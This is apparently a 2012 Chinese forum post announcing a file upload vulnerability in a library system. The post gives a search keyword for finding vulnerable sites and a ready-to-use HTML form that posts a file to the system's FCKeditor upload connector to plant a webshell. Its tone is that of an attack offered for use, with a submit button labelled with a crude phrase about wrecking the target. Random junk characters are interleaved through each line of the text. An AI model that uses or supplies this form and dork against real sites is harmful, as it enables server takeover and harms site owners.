主题:图书馆系统任意文件上传漏洞1 Z' l# l# ~% U S2 j
作者:冰锋刺客# d5 u" I3 C, f
厂商:点击书(dianjishu.com)% g& _! M# ^5 `2 i
日期:2012-6-21; X8 ~5 n7 }) @+ ?9 M3 `
% |1 x* p8 I1 m2 M
I 概述
3 e) p2 H7 [! _5 V: H1 Q) B7 K 点点书库图书馆系统存在文件上传漏洞,导致可以直接拿webshell4 u' `! y/ I1 L
II 简介
1 Y4 h9 k! Z3 i8 _9 u5 X& L1 X% R 关键词:"Copyright (C) 点点电子书库 2009-2010, All Rights Reserved"
$ w' X4 z- O# m+ A5 y 补充一个漏洞
( [) ^7 P2 d7 Z' K0 M. n <form id="frmUpload" enctype="multipart/form-data"
1 Z5 W! [$ y% H action="http://url/admin/js/fckeditor/editor/filemanager/connectors/aspx/upload.aspx?Type=Media" method="post">请上传您的马子<br><input type="file" name="NewFile" size="50"><br>
: t1 L1 u: E( u4 J1 D& C- s <input id="btnUpload" type="submit" value="操翻他">; }% Y& y6 Z% X. c1 U
</form>; ~5 l) }! }, L: U0 v- y
你们懂的
" H' L' ^9 S+ ], L T. `) @* Y 那傻逼提供还需要改包., `# R& O; i4 D5 B) A
自己看了下源代码发现fckeditor
/ E: ~8 |3 [- E C# Y m, v 直接秒杀. O1 N' Y* S1 H' x
|
发表于 2012-9-10 21:20:59
收藏
支持
反对